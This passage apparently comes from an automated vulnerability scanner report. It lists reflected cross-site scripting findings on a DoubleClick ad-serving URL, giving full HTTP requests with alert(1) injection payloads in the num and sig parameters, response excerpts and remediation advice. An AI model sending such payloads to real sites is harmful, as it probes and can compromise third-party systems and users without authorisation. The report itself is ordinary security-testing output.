The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c67b6"-alert(1)-"4472742a4be was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1c67b6"-alert(1)-"4472742a4be&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:17:21 GMT
Content-Length: 7140

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Mar 17 11:27:33 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1c67b6"-alert(1)-"4472742a4be&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg&client=ca-pub-5220960495122375&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

4.62. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53df6"-alert(1)-"7d154b67633 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bh3PBaEfJTb6MKtaP6Abtv72DDrGBmIwC-YGx3B7AjbcBoJ6nARABGAEgi5nvFDgAUMTE0OECYMmGhYmIpIQQoAHXsf3cA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBZ2h0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCglMjJET1JLJTIyKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-4AhioAwHRA-ODOzhDFNad6APdBegDpgPoA5sE9QMCAADEyAQB&num=1&sig=AGiWqtzhPsbh4zDX8jtqjhycbU983h2Dvg53df6"-alert(1)-"7d154b67633&client=ca-pub-5220960495122375&adurl=;ord=628818073? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/ge